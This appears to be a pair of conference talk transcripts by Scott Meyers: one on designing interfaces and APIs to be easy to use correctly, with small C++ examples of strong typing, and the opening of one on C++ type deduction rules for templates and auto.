When you're in the content section here, these are the things that you probably want to work with, but there are some other options for people who are more advanced, in which case they can click on the advanced button and then some more options pop up. The idea is to minimize the likelihood that somebody's just clicking on buttons and gets themselves all messed up by having the user interface designer distinguish between the elementary stuff and the more advanced stuff. I want to point out that progressive disclosure is not the same as categorizing things. So this is from a different program called super. This is a fairly complicated looking interface with all kinds of options, and they're separated by colors into sections, but the point is all the options are still there on one screen. There's nothing there which says this is probably what you want to do, and this is probably not what you want to do. So there's nothing wrong with categorization. Categorization serves a lot of really useful purposes, but just bear in mind categorization is not the same as progressive disclosure. Progressive disclosure is a way of hiding things from people initially because they are unlikely to want to use them. It's a way of making things harder to get at. And it's not something which is limited to user interface design. So if I have an object which has, let's say, 100 methods, number one, I've got a problem already, but if I have an object with 100 methods, and 20 of them are likely to be used a lot, and the other 80 are for very specialized cases, rather than having a single 100 method object, what I can do instead is break it into two objects where one object has the 20 methods that I probably want to use, and the other object actually holds the other 80 methods, so I have to ask for that sub-object in order to get access to those methods. 
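A hypothetical C++ sketch of that kind of split follows; every class and method name here is invented for illustration, not taken from any real toolkit:

```cpp
#include <string>

// The long tail of rarely used operations lives on a separate sub-object.
class ButtonAdvanced {
public:
    void setDebugBorderColor(const std::string& c) { borderColor_ = c; }
    const std::string& debugBorderColor() const { return borderColor_; }
private:
    std::string borderColor_ = "none";
};

class Button {
public:
    // The handful of operations almost everyone needs, directly available:
    void setLabel(const std::string& l) { label_ = l; }
    const std::string& label() const { return label_; }

    // Specialist operations take one extra step: you must ask for the
    // sub-object to reach them, which keeps casual users out of trouble.
    ButtonAdvanced& advanced() { return advanced_; }
private:
    std::string label_;
    ButtonAdvanced advanced_;
};
```

With this split, `b.setLabel("OK")` is one call, while `b.advanced().setDebugBorderColor("red")` deliberately takes two: progressive disclosure at the API level.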
Now, a number of years ago, Ken Arnold, actually almost 10 years ago, wrote an article called Programmers Are People Too, and it was based on the observation that a lot of work is put into user interface design to make it easier for people to use programs, but at the underlying programming level, people are often presented with these very large, complicated APIs that are easy to use incorrectly, and his observation was, why don't we do the same kind of thing with programmers that we do with regular end users? Let's also shield them from this kind of complexity. So the example he talked about was Java Swing's JButton class, which he says offers over 100 methods, but he pointed out that of those more than 100 methods, maybe 15 are the ones that most people dealing with buttons most of the time are likely to want to manipulate, and all the other methods just get people in trouble and lead to a lot more debugging for their programs, so he proposed a better design, which essentially involved taking the JButton class, breaking it into smaller pieces, and the smaller pieces would then be used as sub-objects, so if you wanted to get access to some of these lesser used options, you actually would have to ask for a sub-object, which meant that it was less likely that casual users were going to get themselves into trouble. It's progressive disclosure, but it's at the API level. Another thing you can do to make interfaces easy to use correctly and hard to use incorrectly is simply to document them before you implement them. If you write up the documentation for an interface, whether it's a user interface or whether it's an API, before you've actually implemented the interface, you are likely to find problems of the kind we've talked about so far. For example, if things are inconsistent, when you start writing about it, you begin to notice that they're inconsistent. If things are overly complicated to try to explain to people, then they probably need to be simplified. 
So if there are bad names, so if a name seems to say one thing but actually says something else, you have a chance to change the name. And this whole idea of writing documentation before you actually write the code is completely consistent, for example, with test-driven development, where you are writing the test cases before you're writing the code itself. But it turns out that the very low-tech approach of documenting an interface before you've implemented the interface has the nice side effect of making the interface better in most cases. Assuming you are working in a strongly typed programming language, something which actually does enforce typing, if that is a reasonable assumption, then it's important to understand that the type system is one of the most powerful tools that you have at your disposal. So by using the type system, you can prevent people from making certain kinds of likely mistakes. So let's suppose I have a date class, and here's a date class. It takes an integer month, an integer day, and an integer year. Now, one of the reasons I chose the date class is because the conventions for expressing dates, at least colloquially, in the United States are different from the way that they're expressed pretty much every place else in the world. So there is sort of the inherent possibility of people expressing a date incorrectly. But there's actually a more general observation I want to make. But the first thing is, so if we take the int month, the int day, and the int year, then if somebody doesn't pay close attention, they might say, well, I'm going to pass it in the day, and then the month in the year, or even the year, and the month in the day, which arguably is the most reasonable way to do things. But the interface can't tell the difference. From the interface point of view, they're all just integers. So it has no way of knowing that the wrong things are being passed in. And there is a more generalized observation here. 
Any time you have an API which has two parameters next to one another with the same type, there is the inherent possibility that they can be flipped, and the type system won't be able to tell. So any function taking parameters of the same type that are adjacent to one another, you have just eliminated the possibility of the type system being able to tell you when people pass them in the wrong order. But let's talk about this idea of a date class here. So this date class here, this is an interface that is easy to use incorrectly. People could easily fail to pass in the day, month, and year in the proper order. So well, OK, what we can do, assuming we have a strong type system, is we can create a type for day, a type for month, and a type for year. So now there are actually three different types. Well, now that I've got three different types, I can say, OK, here's my date class. You've got to pass in the month first, the day second, and the year third. So now if you do not pass them in the right order, the compiler through strong type checking can ensure that your code does not compile. This means we've just eliminated a whole class of errors. People can't pass these things in the wrong order. So that's a nice improvement. Now, it also means that the code is clearer. So if I say, all right, I want to have a date D with 4, 8, and 2005, somebody reading that code could easily misinterpret, OK, is that April 8th or is that August 4th? It's not quite clear from looking at it. When you spell out the types, it's quite clear exactly what's going on. So that's an improvement. So it's easier to read as well as being harder to make mistakes. I want to point out that the technique of introducing new types for strong type checking only works if you actually are introducing new types. 
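A minimal sketch of that technique, under the assumption that simple wrapper structs are enough (real code would add range validation):

```cpp
// Distinct wrapper types: the compiler can now tell a day from a month
// from a year, so arguments passed in the wrong order will not compile.
struct Day   { explicit Day(int d)   : val(d) {} int val; };
struct Month { explicit Month(int m) : val(m) {} int val; };
struct Year  { explicit Year(int y)  : val(y) {} int val; };

class Date {
public:
    Date(Month m, Day d, Year y) : m_(m.val), d_(d.val), y_(y.val) {}
    int month() const { return m_; }
    int day()   const { return d_; }
    int year()  const { return y_; }
private:
    int m_, d_, y_;
};

// Date ok(Month(4), Day(8), Year(2005));   // clear to readers, compiles
// Date bad(Day(8), Month(4), Year(2005));  // would NOT compile
```

The call site now reads unambiguously as April 8th, and the wrong argument order is a compile-time error rather than a latent bug.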
So if you're working in languages with type aliases, where you can create another name for an existing type, C and C++ are the examples that come to mind, if I say, OK, day is a synonym for int, month is a synonym for int, and year is a synonym for int, and then I say, here's my date class, which takes a month, a day, and a year. This is a beautiful looking interface. The problem is, as far as the compiler is concerned, it's date of int, int, int. This is what I call programming to make you feel better about yourself. I mean, it looks beautiful, but the problem is you can now say I'm going to pass in a day, a month, and a year, which is the wrong order here, and the code continues to compile. So if you're going to use the type system, you actually have to use the type system, not the apparent type system. That doesn't do you any good. And if you want to know why my fixation is with April 8, 2005, that's the day we brought our puppy home. That's Darla. Now, Darla is adorable, needless to say. But since we're focusing on interfaces, it's important to recognize, even with what we've talked about so far, there are still ways to make mistakes with this kind of an interface. So what I could do is I could say, OK, I want to have the month m, but the month is minus 4. Now, why would you type minus 4 as a month? Nobody would type minus 4 as a month. However, let's suppose you're supposed to be calculating the month. And instead of saying something like a plus b, you accidentally said a minus b. People have been known to make those kinds of mistakes. So you might accidentally compute the month incorrectly. Now, in this particular case, last I checked, there are only 12 valid months. So if there's only 12 valid months, it doesn't make a lot of sense to me to represent them by probably an integer which could represent 4 billion possible values. 
When you have a constrained set of values, in many cases, you are better off designing an interface that constrains the values to only the ones that are known to be legitimate. So what we could do is we could say, all right, I've only got 12 month values that make any sense. So what I'm going to do is I'm going to create 12 month objects, give them the appropriate name, and make it so nobody can create any other month objects. So for example, I might say, here's my class Month, and then I've got objects for January, February, all the way down through December. In this case here, I am making the constructor for Month private, which means nobody can create any other Month objects. So I've said, here are the 12 Month objects that you're permitted to use, and you can't create any more, which means that now it's essentially impossible to create invalid months. You've eliminated a whole class of errors. So if I try to say the month m is minus 4, this won't compile because this is trying to create a brand new Month object, and we've made construction illegal for those kinds of things. But I could say the month is Month::April, and that'll work. So that's nice. That's an improvement. Well, the problem now is, OK, so I could say, all right, the day d is 71. Well, last I checked, there are not any months with 71 days in them. So it's interesting, though, to think about what we can do about dealing with that problem. I believe it is an extremely useful exercise when looking at any interface to always ask yourself, how could this interface innocently be misused? No one's going to type 71, but again, a formula might yield something which isn't valid. So the question is, how could we prevent these kinds of mistakes? Now, what we could do in this particular case is I could say, well, all right, if I know what year it is, and I know what month it is, I now know how many days there exist in that particular month. 
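Backing up to the twelve-valid-months idea for a moment, here is a minimal sketch. The talk describes twelve named static objects; named factory functions, used below, are an equivalent way to get the same effect of a private constructor plus a fixed set of values:

```cpp
// Only the twelve named Month values can ever exist: the constructor is
// private, so client code cannot manufacture Month(-4) or Month(13).
class Month {
public:
    static Month Jan() { return Month(1); }
    static Month Apr() { return Month(4); }
    static Month Dec() { return Month(12); }
    // ... one named factory per remaining month ...
    int value() const { return val_; }
private:
    explicit Month(int m) : val_(m) {}
    int val_;
};

// Month m(-4);            // would NOT compile: constructor is private
// Month m = Month::Apr(); // fine: one of the sanctioned twelve values
```

Whether an accidentally miscomputed month is worth designing out this way is exactly the engineering trade-off the talk goes on to discuss.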
So one could imagine an API where you first you create a year object, you go to the year, you then have it give you month objects, and once you've got a month, it will then give you day objects, and then it would be impossible to specify the wrong day, or at least an invalid day. You can specify the wrong day, but you can't specify a day that does not exist. Once you've come up with a possible way to prevent people from making certain kinds of mistakes, then you can say, all right, what is the likelihood of making the mistake, and how serious will it be if somebody makes it? And how much work is it going to be for me to prevent people from making that mistake? Once you have those two pieces of information, you can start doing an engineering judgment for the trade-offs. You can say, all right, this is how likely it is, and this is what it's going to cost me if I do it, and this is how much work it is to prevent people from making that kind of mistake, is it worth it or is it not worth it? I can't tell you the answer to that question, but what I can tell you is that in my experience, most people don't do the analysis in the first place. They simply decide, all right, this is what we're going to implement for an API, and we're not going to worry about the kinds of mistakes that people can make. That's what I just said. Now, constraining values is not always the best way to go. So this happens to be, this is from a couple of years ago, Lonely Planet has changed its website, which will become relevant in a moment. But so this says, all right, so I've specified, as I recall here, so the month has been specified to be June, but notice I can choose June 31st. So this is an example of an interface that makes the interface designer feel like they're really doing a great thing, they're constraining the values. The problem is they're not making it impossible to choose illegal values. 
So this is an example of an interface that looks like it's constraining values for a reasonable case, but it actually doesn't solve the problem. What would be a better way to solve this problem? Pardon me? Have a calendar widget, so you'd only be able to click on the appropriate things in the first place. So this problem can literally be designed out of existence. What struck me when I did this a couple of years ago, so I went to Lonely Planet where if you want to fly, then you go to their flight logger. Now, with the flight, you actually do have a calendar that you choose. And in fact, there's no drop downs. On the other hand, if you wanted to do a hotel, then you had drop downs and you had widgets. But if you wanted to rent a car, you only had drop downs. And the reason I bring this up is because, remember, inconsistency is one of the things that makes an interface easy to use incorrectly and harder to use correctly. So this is an example of them having three different approaches to solving the same basic problem. So this is from about a year and a half ago, I think. I actually checked shortly before I came here. And right now they have a uniform interface. At least they did when I left. But what they have right now, I don't know. The last thing I want to mention is to avoid over reliance on string. So if I have an integer in my program, that is almost a meaningless piece of information. That is not a useful type. An int, what does that mean? A street number, an age, the number of microseconds since, I don't know, January 1, 1970, the number of people who attended this conference. An int is almost useless information. String is similar. If you have a type that is a string, that does not help the compiler help you. So for example, if I have a file name, a file name is a completely different kind of thing, for example, from a customer name. And both of those are really different from, for example, a regular expression. 
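A minimal sketch of giving those conceptually different strings their own types (all names here are invented for illustration):

```cpp
#include <string>
#include <utility>

// A file name and a customer name are different kinds of things, so give
// each its own type instead of passing raw std::strings around.
class FileName {
public:
    explicit FileName(std::string n) : name_(std::move(n)) {}
    const std::string& str() const { return name_; }
private:
    std::string name_;
};

class CustomerName {
public:
    explicit CustomerName(std::string n) : name_(std::move(n)) {}
    const std::string& str() const { return name_; }
private:
    std::string name_;
};

// Only a FileName is accepted here; handing it a CustomerName -- or a
// bare string -- will not compile, so a mix-up is caught before runtime.
inline std::string pathFor(const FileName& f) {
    return "/data/" + f.str();
}
```

The two wrapper classes are structurally identical, and that is the point: their distinctness exists purely so the compiler can refuse to substitute one for the other.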
If I have different types for things that are conceptually different, that means that the compiler can make sure I only use them in correct ways. I can do much better validity checking on them. I can also format them for printing things out, stuff like that. I dealt with a client one time, and they had to deal with printer names and with printer driver names. They were both file names, so they just had a string which represented the name. And they actually spent a fair amount of really unpleasant debugging time trying to figure out why their program was not working, because they passed in a driver name when they should have passed in a printer name. Because the type system did not realize that these are two completely different kinds of things that are not substitutable to one another. So the summary of what I have to say here is I do believe that the single most important design guideline is to make interfaces easy to use correctly and hard to use incorrectly. And we talked about some specific ways that you can try to implement that basic idea. One of them is to adhere to the principle of least astonishment. And you can do things like avoid gratuitous incompatibilities with things that are in the surrounding environment, choose good names, which are still really hard to choose and still extremely important, and be consistent in whatever choices you make, whether it's for layout or for naming or for concepts behind things so that people can figure out what you're doing. We talked about progressive disclosure, which is a mechanism that discourages people from going into the places that will probably get them in trouble and encourages them to stay in the areas where they're probably going to get the results that they want. We talked about the very simple approach of documenting interfaces before we actually implement them. 
And then under the assumption you are working with a programming language which has some kind of strong typing, we talked about introducing new types to prevent errors. And I emphasized that they have to be types, not type synonyms, so the type system can help you out. We talked about possibly explicitly defining all the values for that type so that people can't create invalid values. And then I concluded by saying you should avoid over reliance on string. If you are interested in more information on any of these kinds of topics, there's some references here on especially interface and API design, some stuff on user interface design, and that's the end of that. So are there any questions? Yes? What type of APIs do you like? What kind of APIs do I like? APIs you look up to because they are well designed. So the question is to name an API that I like because I think it's really well designed. Unfortunately, most of my time is spent in the world of C++ and I don't know of any APIs in that world that I would really hold up and say this is a great example of API design. I wish I had some. I mean, there are some in that realm that I would say are pretty good, but I wouldn't call them great. So actually, because it's very late in the day, so I'm going to say thank you very much. You can ask a question later. That'd be fine. So thank you very much for coming. And on your way out, please be sure to pick up the little colored pieces of paper and put them in the bin. So thanks very much. Thank you.
At last year’s NDC, Scott Meyers devoted an entire day to guidelines for improving the quality of software, regardless of the application, the language in which it's written, the platform on which it runs, or the users it is intended to serve. This year, by popular demand, Scott isolates the single most important guideline from last year’s talk and focuses on it in this session. The guideline is Make interfaces easy to use correctly and hard to use incorrectly. Scott explains how this applies to both user interfaces and APIs, and, with specific advice and countless examples, shows how to employ it to improve the quality of the many interfaces in your software.
10.5446/50637 (DOI)
I would like to begin with an apology because this is a talk I really wish I did not feel compelled to give. Because really, type deduction, I mean really, an entire talk on type deduction? I've been working for the past couple of years on a new book on C++ and when I first sat down to write the book, I did not plan to say anything about type deduction. And what I found was that it was impossible for me to describe many, many topics without assuming type deduction. So I finally reluctantly said, well, okay, I'll add an item on type deduction. Okay, I'll add two items on type deduction. Okay, I'll add a chapter on type deduction, which is now the beginning of the book, which is so sad because I really did not want to talk about that. But this is about C++ type deduction and why you care. So I want to talk a little bit about why you care. Let me start by pointing out that in C++ 98 we had templates, which means we had type deduction. And in my experience, you didn't really need to know the rules, the right thing just happened. And as an example, it's my job to know this stuff. I never bothered to learn how C++ type deduction worked in C++ 98. It worked so naturally and so obviously, I never really had to think about it very much. So I assumed it would be a similar thing when I got to C++ 11. That's not what my experience was. So in C++ 11, there's a lot more context in which type deduction takes place. So it's not just templates any longer. We've got auto variables, we've got universal references, we've got lambda captures, which do type deduction. We've got returns, which do type deduction. We have decltype, which does type deduction. So there's a lot more places where type deduction is taking place. And as a result, it just works not as often. There's actually six different sets of type deduction rules that I have identified. 
In C++ 14, they didn't introduce any new sets of rules for type deduction, but they did expand the scope where type deduction can take place. So now function return types, lambda init captures. And as a result, we've got six sets of rules applied in a variety of different ways. It's a lot easier to get confused than it used to be. And recently I've been trying to make sense of this myself. So this is my attempt to describe the landscape of type deduction in C++. And by the way, why do you care? You care because it's going to be very difficult to make sense of how to program in C++ 11 and C++ 14 without knowing what's going on. So in C++ 98, we used to say there's one set of rules. There's template type deduction. But actually, there's two sets of rules within template type deduction. If you have a parameter that is a reference or is a pointer, that uses a different set of rules than if you have a parameter which is taken by value. So there really were two sets of rules in C++ 98. So then C++ 11 decided to add a few more. So it augmented the rules for template type deduction. So now if you have a template parameter, which is what I call a universal reference, it has another set of rules for doing type deduction. But C++ 11 then also decided to give lambda functions an implicit return type. It actually follows the same rules as by-value template parameters. So not a new set of rules, but a new way of applying them. It also added decltype, which is a completely different way of deducing types. It then decided to add lambda captures. Now the lambda captures are based on the rules, oddly enough, for references and pointers in templates, but they're not the same as them. So you should read this line as just saying, this is based on these rules, but it's not identical to them. It's not supposed to be derivation. It's not a subset. It's not a superset. It's just different, but related. C++ 11 also added a way to declare objects using auto. 
That actually uses the template type deduction rules, but adds some stuff of its own, which we will see. So it's not the same. In C++14, we then have lambda auto parameters, which use the template type deduction rules. We have an auto return type on all functions, which uses the template type deduction rules. What I want you to notice is that an auto return type uses template type deduction, which is not the same as an auto object. So you can't even say there's one set of rules for auto; there are multiple sets of rules for auto. There's also decltype(auto), which uses the decltype deduction rules. There is a lambda init capture, which actually uses the auto rules. My hope is that within the next hour, I will describe everything here to you except for C++11 lambda captures. Those are the most important rules that I think you need to know. So that's my current understanding of type deduction in C++. There are six different kinds: three kinds inside template type deduction, and then we've got C++11 lambda capture, we've got auto, and we've got decltype. That should keep us busy for a little while. I'm going to start with stuff that, in theory, you already know, so try not to nod off or check your Facebook page while we're talking about this. We're going to start with template type deduction, since it's, in some sense, the core of the whole business. If I have a function template f with a type parameter T, type deduction will be deducing a type for T. But usually we also have some kind of a parameter type which has to be deduced, and we're actually deducing both of those things simultaneously. So if I pass an expression to this template, given the type of the expression, I want to figure out: what is T, and what is the parameter type? I'll be giving a lot of examples, so we'll see how this works. There are three general cases for template type deduction. It's not one set of rules, it's three.
So either the parameter type is a reference or a pointer, but it's not a universal reference; or it is a universal reference; or it's not a reference and it's not a pointer. So let's start with the simplest case, which is we have a function parameter that's a reference or a pointer, but it's not a universal reference. Now, I want to point out here that the rules I'm going to describe are very, very intuitive. Nothing here should surprise you. So there's not going to be, I hope, any news here at all. If I have some function f which takes a reference parameter, T ref, we've got to figure out what is the type for T and what is the type for T ref. So if x is an int, if cx is a constant int, and if rx is a reference to a constant int: if I call f of x, the type of x is int, so T is deduced to be int and param is deduced to be int ref. So T is int and param is int ref. This should surprise no one. If I have a constant int and I pass the constant int here, well, then I'm going to have a reference to a constant int, which means the parameter type will be reference to constant int, which means T will be constant int. So T is constant int, the parameter type is reference to constant int. The only thing that is mildly surprising, and it's not surprising really, is if I have an argument that I pass to the template and the argument is itself a reference. So in this case, rx is a reference to a constant int. To deduce the type, you throw away the reference. So I start with reference to constant int, and if it's a reference, you ignore that: you throw away the reference and treat it like a constant int. And as a result, when I call f of rx, again, T is deduced to be constant int, and the parameter becomes a reference to a constant int. It's the same as passing in the constant int itself. And what I want you to notice is, in this case here, when I pass in a reference, the type T is never deduced to be a reference. It throws that reference away.
This has been true since 1992, maybe 1990. Nothing's changed. If the parameter type is a constant reference to a T, the type that is deduced for T will change, but the parameter type won't. So, same situation: x is an int, cx is a constant int, rx is a reference to a constant int, just like we had before. X is an int, so T is deduced to be int, and the parameter type becomes reference to constant int. So T is int, parameter type is reference to constant int. So even though x is an int, the const got added here. Again, there is nothing counterintuitive about what I'm showing so far. If I have a constant int, well, then this is already const, so the type T is just deduced to be int, and the parameter remains reference to constant int. So in this case here, T is deduced to be int, and the reason I've written the const in gray is because on the previous slide, we deduced const as part of the type. Now, because const is part of the parameter type, we don't deduce T to have const in it. The const is still there, but it's not in the deduced type; it's now in the parameter type. And similarly, when I have f of a reference to a constant int, we throw the reference away, like we always do so far, and then we apply the regular rules: this is a reference to a constant int, we throw the reference away, we have a constant int, which means we get the same results as we do here. And again, notice that the type T is deduced to be int, not a reference. So the only mildly interesting thing about what we've talked about so far is that if you have a reference and you pass it in, you throw the reference away. That's it. This should not be surprising in any way. If I have a pointer parameter, it uses basically the same rules: if x is an int and px is a pointer to a constant int, and I pass in a pointer to an int, then the type T is deduced to be int and param becomes int star, just as you would expect.
And if I have a pointer to a constant int and I pass this in, well, then I have a pointer to a constant int, which means T is deduced to be const int. There still should not be anything that looks even remotely interesting. This is all obvious; this has all been this way for 20 years, more than 20 years now. When you use auto, for purposes of discussion right now, auto uses the same rules as template type deduction, except that the type T, which would be deduced for a template, is represented by auto. So the question is: what is the type deduced for auto? It's going to use the same rules I've just explained to you. So x is still an int, cx is still a constant int, rx is still a reference to a constant int. That has not changed. Now remember, there are three sets of rules for template type deduction. We are doing the first of those three, where the type is a reference or a pointer. So auto ref: because it's an auto ref, we treat it as if it is a template type parameter that is a reference type. So in this case here, we're going to get a reference to whatever x is. Well, x is an int, so v1's type is int ref, and auto is deduced to be int. V2: this is a reference to whatever cx is. Cx is a constant int, so auto is deduced to be const int, and v2 is a reference to a constant int. Now, in this case here, we have an auto reference. Rx is a reference to a constant int, so we throw the reference away. That just leaves us with a constant int, and we get the same results as we would for the constant int. And if it's a const auto ref, it's exactly the same as when I had a const T ref in the template. So x is of type int, so this will be a reference to a const int; auto's type is deduced to be int, and v4's type is a const int ref. This const arises because it's present here. If I have a reference to a const auto, well, cx is a constant int, I'm going to get a reference to a const int, and auto's type is now int.
I've grayed out const because on the previous slide we deduced const for the type, but now, because const is part of the auto declaration, it's no longer deduced for the type of auto. And it's a similar situation with rx: this is a reference to a constant int, we throw the reference away, and proceed as if it's a constant int. If you are not bored out of your mind at this point, I am not doing my job. This is completely intuitive. There's nothing surprising about what's going on. So basically, case number one, which is by reference or by pointer, either parameters or auto variables: everything proceeds the way it's proceeded for the past 20-plus years. It's completely intuitive. There are no surprises. Now, where there is a surprise is when you start talking about what I call a universal reference. How many people are familiar with the term universal reference? All right. So there is no such thing as a universal reference according to the standard. However, if you have a template function that takes a parameter of type T ref ref, special rules apply for type deduction. And because special rules apply, I believe it is worthwhile to have a special name for this kind of parameter, because it doesn't behave like any other kind of parameter. So a universal reference is simply a T ref ref parameter in a function template or, as we shall see, an auto ref ref object. And what makes it special is that it's treated just like a normal reference parameter. It is a reference. Except it has one special rule. I'll tell you what the rule is in a minute, but if you read it just flat out, it will make you crazy. So let's see some examples first. How many people are familiar with r values and l values? Okay. There's a number of people who did not raise their hands, and this is going to pretty much assume you are familiar with r values and l values. So, very, very quickly: an l value is something that you can typically make an assignment to, or you can take its address. Think of normal variables as an l value.
There's lots of special cases, but normal variables are l values. You can take their address, you can give them values. That's an l value. An r value, generally speaking, is a temporary object. Think of something returned from a function. Think about the result of a cast. Those would be examples of r values. R values have no name, and you can't take their address. Think of temporary objects; that's what they're modeled on. The reason we have universal references is that sometimes it is useful to be able to have somebody call a function passing either an r value or an l value, and have the information as to whether it is an r value or an l value captured by the template, so it can be propagated to further function calls. That's what makes universal references special: they capture the information about whether what was passed to them was an l value or an r value. It is the only kind of parameter that does that. X is still an int, cx is still a constant int, rx is still a reference to a constant int. Nothing's changed. When I call f of x, x is a normal variable: you can take its address, you can give it values. X is an l value. And here's the special rule. When you pass an l value to a template that takes a universal reference parameter, you look at the type of the l value. In this case, the type of x is int. So now you've got the type int, and you add an l value reference to it. This is important, because remember, in all the examples I've shown you up until this point, we never deduced a reference as the type of a template argument. The references were always stripped. Now we're adding one. So x is an l value; that means T is deduced to be int ref. So the type T here is actually deduced to be a reference to an int, which means that param becomes an r value reference to an l value reference to an int. And I don't want to spoil the ending, but I must: it turns out that there are rules for dealing with references to references.
And the rules are: if you have an l value reference to an r value reference, or an r value reference to an l value reference, if there's an l value reference involved anywhere, the result is an l value reference. I just explain the rules, I don't make them. And so we end up with an r value reference to an l value reference, and the result is that the parameter type is actually int ref. This becomes important if you're trying to read header files. So if you see this, you go, oh, f, it takes an r value reference to a T. And the answer is: maybe it takes an r value reference to a T. Because if an l value is passed in, this parameter type actually becomes an l value reference to a T. And if you came into this room and you're not familiar with l values and r values or universal references, I apologize; it's not going to get much better. Cx: it has a name, you can take its address. You can't assign to it, but you can take its address. Cx is also an l value. As a result, the type that is used for T is, well, the type of cx is const int. That's its type. But because it's an l value, and we have this special kind of parameter, the type that is used for it is const int ref. We therefore end up with an r value reference to an l value reference, which collapses down to an l value reference, which means that the type of param is l value reference to const int. If I say f of rx, well, this is a reference to a const int; we still throw the reference away. So the reference gets discarded, and we're left with a const int. Rx has a name, you can take its address, which means it's an l value. Because it's an l value, we treat it exactly the same way as we did cx here. So again, T is const int ref, and the parameter type is reference to const int. Numeric literals, like, say, 22: numeric literals are defined by the language to be r values. That's just the definition. And it makes sense. You can't take the address of the literal 22.
The surefire test for l value-ness is whether you can take its address. Almost surefire. Usually fires. So 22 is an r value. Because 22 is an r value, there's actually no special rule; the special rule is only for l values. So this is of type int, which means T is deduced to be int, which means param is an r value reference to an int. So T is int, and the parameter type is r value reference to int. You can memorize the rules, but frankly, you're much better off simply thinking about it this way. Let's go up a level of abstraction. What this means is, if I have a function template that takes a universal reference parameter, then if the function is called with an l value, the resulting template instantiation will take an l value reference parameter. And if I call that template with an r value, the resulting template instantiation will have an r value reference parameter. I mean, the rules get you there, but that's what they're actually trying to achieve at a high level. So what this means is I have a single template which can be instantiated twice for every type. So for int, I can get an l value reference instantiation, and I can get an r value reference instantiation, depending on what's passed in. This is primarily useful for what's known as perfect forwarding. It's all intertwined with move semantics. But from a type deduction point of view, which is the purpose of this talk, what I want you to remember is: special rule for universal references. Any questions about this? Everybody's thinking, I should have gone to the talk on Scala. There must have been a talk on Scala. Okay, so now we've talked about two of the three kinds of type deduction rules for templates. We talked about deducing types for references and pointers that aren't universal references: completely intuitive, yawn. We talked about deducing types for universal references: special rule for l values. Which leaves by-value parameters.
That's the third kind of template type deduction: by value. With a by-value parameter, like this here, someone's going to pass you something and you're going to make a brand new copy of it. Param is going to be a brand new object; it will be constructed. This is important. Because it's a brand new object, if somebody initializes it with something that's const, we don't care about the const, because we're going to get our own copy of it, and our own copy won't be const. So what's different about pass-by-value is that you discard const and volatile qualifiers. How many people are familiar with volatile? That is so sad. I would like all of you to wipe volatile from your minds. No good can come of it. It's especially dangerous if you ever want to have children. Don't even think about volatile. All right. X is still an int, cx is still a constant int, rx is still a reference to a constant int. This says I want to create a brand new object of type T from an int, so the type that's deduced is int and the parameter type is int. This says I have a const int and I want to make a copy of it. Now, if I take a const object and I copy it, the copy doesn't need to be const. So it's not; we discard the constness. So with f of cx, the type that is deduced is just int, because we're making our own independent parameter. The original const object is not modified, so we are not violating const correctness. Similarly, when I have a reference to a constant int, we take that reference and we still throw it away. That has not changed. Now we're left with a const int, and because it's being passed by value, we throw the const away. The type deduced is int; the parameter type is also int. So with by-value parameters, we throw away const, and volatile if we happen to have it. We always throw away references; with by-value parameters, we also throw away const. That's another set of rules.
Auto basically uses the same rules, and for purposes of our discussion so far, auto uses exactly the same rules. So in this case here, x is still an int, cx is still a constant int, rx is a reference to a constant int. They're never going to change. They're going to always be those things in my slides. I hope. So I say v1 auto; this auto here, notice it's not a reference, it's not a pointer. We're going to use the by-value type deduction rules. So this auto will deduce int. This auto will deduce int because although this is a constant int, we're making a brand new copy, so we throw the constness away for the copy. Rx throws away the reference like we always do, and throws away the const, because we're making a completely independent copy. In all three cases, the type is int, and auto deduces the type int. Auto is never deduced to be a reference. But if you add a reference to auto, then you go back and use the rules for deducing a type for template parameters which are references. And if it's an auto ref ref, a universal reference, then you apply the universal reference type deduction rule. So for example, in this case here, v6 is a universal reference. It's being initialized with rx. Rx is a reference to a constant int. We still throw the reference away, leaving us with a constant int. But rx has a name; you can take its address. It's an l value. Because it's an l value, the type that is deduced for auto is a reference to a constant int, which, because we then have an l value reference and an r value reference together, through a process known as reference collapsing, eventually ends up as constant int ref. And this is important for reading source code, because notice that it says auto ref ref in the source code, which means you might think, oh, I have an r value reference. But you don't. In this case here, the type of v6 is an l value reference to a constant int. It's not an r value reference, because it's using the universal reference type deduction rules. OK.
Any questions so far? OK. There is a difference between a constant expression and an expression that contains const. They're not the same thing. So here is a function, some func. It takes three parameters. Parameter number one is a constant pointer to a constant int. Parameter number two is a pointer to a constant int, and parameter number three is a pointer to an int. Parameter number one is a constant pointer to a constant int. That is an example of a constant expression. The pointer itself is const. And what it points to is also const. So it contains const, that's what it points to, but the expression itself is also const, the pointer itself is const. On the other hand, param 2 is a non-const expression, it's a regular pointer, that pointer can be assigned, it can be set to null, but it points to something which is const. That is an example of an expression that contains const. I say auto p1 is param 1. Now notice that this is by value, there's no reference here, there's no pointer here, we're going to use the by value rules. Now the by value rules say, first throw away a reference, but param 1 isn't a reference so there's no reference to throw away. And then what it says is, if it's const, throw away the const nest. Well, param 1 is const, so we discard the const nest because we are copying this pointer, which is const, to make a brand new pointer, the brand new pointer isn't const. But both of them point to something which remains const. So p1's type is a pointer to a constant int, which means this const is maintained, but this const is thrown away. This makes sense. If I have a pointer to a constant object and I copy the pointer, the resulting pointer still has to point to something which is const. I have to respect the fact that this pointer said what I point to is const. So if I make a copy of that pointer, it still points to something which is const. But if the pointer itself is const, it can't be set to null, for example. 
If I copy the pointer, the new pointer could be set to null. Param2 is not a const object, but it points to const, so the type of p2 is pointer to const int. And param3 is a pointer to an int, so it should not surprise you that p3 is a pointer to an int. What I told you earlier is that if you are dealing with a by-value parameter to a template, or equivalently an auto that is not adorned with references or pointers, it's creating a brand new object. And what I told you is that if the expression is const or volatile, you ignore that. That's technically accurate. The most common phrasing you will hear from other people, or in books or magazines or anything you read on the Internet, is that top-level const and volatile are ignored. When they say that, what they mean is: if the object itself is const or volatile and you copy it into a brand new object, the constness or volatileness of what is being copied is discarded. But if it's a pointer to const, that const is retained. If it's a reference to const, that const is retained. So these are just two different ways of saying the same thing. But it doesn't mean you throw all the consts away. That's not what happens. So, exactly the same kind of example: if I now say p2 is a reference to an auto, so this is an auto ref, this means we now follow the reference parameter rules for templates, because so far everything in auto uses the same rules as templates. So param1 is a constant pointer to a constant int, so p2 is a reference to a constant pointer to a constant int. Do you only throw away that constness if it's a by-value pass? Have I apologized for having to explain this? It turns out there's a couple of special cases which I'm actually pleased to not have time to go through now.
